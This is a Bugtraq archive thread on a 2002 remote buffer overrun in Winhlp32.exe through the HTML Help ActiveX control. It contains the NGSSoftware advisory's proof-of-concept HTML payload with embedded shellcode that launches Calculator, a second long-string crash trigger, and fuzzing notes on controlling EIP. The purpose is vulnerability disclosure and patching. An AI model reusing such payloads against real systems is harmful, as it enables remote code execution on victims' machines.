Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

RE: Winhelp32 Remote Buffer Overrun

From: "Drew" <dcopley () eeye com>
Date: Tue, 6 Aug 2002 19:48:13 -0700
Correction, closing out of the app brings up an error where the memory
read
is controlled at 4141414d (EIP is elsewhere), so it appears to be a
different 
type of crash by behavior entirely... but exploitable.

Would need to stick a debugger on it and mess around to narrow it down.




-----Original Message-----
From: Drew [mailto:dcopley () eeye com] 
Sent: Tuesday, August 06, 2002 7:31 PM
To: 'Mark Litchfield'; 'Jelmer'; 'bugtraq () securityfocus com'
Subject: RE: Winhelp32 Remote Buffer Overrun


Running this on my local file fuzzer, Litchfield's begins to 
hit exceptions at 
200 increments. (At a blank value it gives a memory error).

At 216 increments (and at least for awhile, above) it 
overwrites EIP with 
41414141. (Windows 2000 Service Pack 2). 

Testing Jelmer's as it was written below I ran to 10,000 
increments and did not find an issue. Testing to 10,000 with 
.TIF as the extension did not find an issue. Testing these 
same case tests with using the method 
HHClick() as in Litchfield's does not give an issue.

It may have been with another method, or perhaps some 
interaction with the webpage. It may be the characters used 
to bruteforce it. Perhaps, they were unicode (which I could 
test, as well as anything else).




-----Original Message-----
From: Mark Litchfield [mailto:mark () ngssoftware com]
Sent: Tuesday, August 06, 2002 12:24 PM
To: Jelmer; bugtraq () securityfocus com
Subject: Re: Winhelp32 Remote Buffer Overrun


If I am not mistaken, I believe that Microsoft are aware of
this issue and have an IE patch comming out very shortly.  My 
brother reported this to them, please see 
http://www.nextgenss.com/vna/ms-whelp.txt

Regards

Cheers,


Mark Litchfield

----- Original Message -----
From: "Jelmer" <jelmer () kuperus xs4all nl>
To: "Next Generation Insight Security Research Team"
<mark () ngssoftware com>; <bugtraq () securityfocus com>; 
<ntbugtraq () listser ntbugtraq com>
Sent: Thursday, August 01, 2002 5:19 PM
Subject: Re: Winhelp32 Remote Buffer Overrun



I just installed servicepack 3 and the following code still

crashed my

my IE6 with a memory could not be refferenced error.

 <OBJECT ID=hhctrl TYPE="application/x-oleobject"
CLASSID="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
    <PARAM name="Command" value="Shortcut">
    <PARAM name="Button" value="Bitmap:shortcut">
    <PARAM name="Item1" value=",,">
    <PARAM name="Item2" value="273,1,1">
    <PARAM name="codebase" value="">
    <PARAM name="Font" value=" A VERY VERY LONG STRING "> 

</OBJECT>


I have been told this means it is most likely 

exploitable. I am not

into buffer overflows myself though, maybe someone can 

confirm this.

Anyways I notified microsoft of this several months ago.

The day after

I notified

them

someone pointed me to the ngssoftware advisory *sob*, and I

notified

microsoft that this was probably the same issue, last I heard from
them

they

where looking in to if this was indeed the case. It's been several
months and as far as I know they are still looking.

--
 jelmer

----- Original Message -----
From: "Next Generation Insight Security Research Team"
<mark () ngssoftware com>
To: <bugtraq () securityfocus com>; <ntbugtraq () listser ntbugtraq com>
Sent: Friday, August 02, 2002 3:59 AM
Subject: Winhelp32 Remote Buffer Overrun



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

NGSSoftware Insight Security Research Advisory

Name:    Winhlp32.exe Remote BufferOverrun
Systems Affected:  Win2K Platform
Severity:  Critical
Category:               Remote Buffer Overrun
Vendor URL:   http://www.mircosoft.com
Author:   Mark Litchfield (mark () ngssoftware com)
Date:   1st August 2002
Advisory number: #NISR01082002


Description
***********

Many of the features available in HTML Help are

implemented through

the HTML Help ActiveX control (HHCtrl.ocx). The HTML 

Help ActiveX

control is used to provide navigation features (such as a 

table of

contents), to display secondary windows and pop-up

definitions, and

to provide other features. The HTML Help ActiveX control

can be used

from topics in a compiled Help system as well as from HTML pages
displayed in a Web browser. The functionality provided by 

the HTML

Help ActiveX control will run in the HTML Help Viewer or in any
browser that supports ActiveX technology, such as 

Internet Explorer

(version 3.01 or later). Some features, as with the

WinHlp Command,

provided by the HTML Help ActiveX control are meant to be

available

only when it is used from a compiled HTML Help file

(.chm) that is

displayed by using the HTML Help Viewer.

Details
*******

Winhlp32.exe is vulnerable to a bufferoverrun attack

using the Item

parameter within WinHlp Command, the item parameter is used to
specify the file path of the WinHelp (.hlp) file in which the 
WinHelp topic is stored, and the window name of the 

target window.

Using this overrun, an attacker can successfully exectute

arbitary

code on a remote system by either encouraging the victim

to visit a

particular web page, whereby code would execute

automatically, or by

including the exploit within the source of an email.  In

regards to

email, execution would automatically occur when the mail

appears in

the preview pane and ActiveX objects are allowed (This is

allowed by

default, the Internet Security Settings would have to be

set as HIGH

to prevent execution of this vulnerability). Any exploit would
execute in the context of the logged on user.

Visual POC Exploit
******************

This POC will simply display Calculator.  Please note that this
written on a Win2k PC with SP2 installed.  I have not 

tested it on

anything else.

<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width" 
VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM 

NAME="Command" 

VALUE="WinHelp"><PARAM NAME="Item1" 


VALUE="3ÀPhcalc4$&#402;À&#1;PV¸¯§éwÿÐ3ÀP¾&#8221;éwÿÖAAAAAA

AA




AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA





AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP





PPPQQQQRRRRSSSSTTTAAAA&#11;©õwABCDEFGH&#402;Æ&#21;ÿægMyWindow"><PARAM

NAME="Item2" VALUE="NGS Software LTD"></OBJECT> 
<SCRIPT>winhelp.HHClick()</SCRIPT>


Fix Information
***************

NGSSoftware alerted Microsoft to these problems on the 6th March
2002. NGSSoftware highly recommend installing Microsoft 

Windows SP3,

as the fix has been built into this service pack found at
http://www.microsoft.com An alternative to these patches 

would be to

ensure the security settings found in the Internet

Options is set to

high. Despite the Medium setting, stating that unsigned ActiveX
controls will not be downloaded, Kylie will still execute 

Calc.exe.

Another alternative would be to remove winhlp32.exe if it is not
required within your environment.
A check for these issues has been added to Typhon II, of 

which more

information is available from the
NGSSoftware website, http://www.ngssoftware.com.

Further Information
*******************

For further information about the scope and effects of buffer
overflows, please see

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf








-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use
<http://www.pgp.com>

iQA/AwUBPUnnf8a1CFAff8bXEQLz8gCgm4lbs5Fs2WUH5Au2cAkG0JQKKLMAn13p
a+qSkYWrz7uspZcqqRTc2r0C
=2PKN
-----END PGP SIGNATURE-----
Previous By Date Next
Previous By Thread Next

Current thread: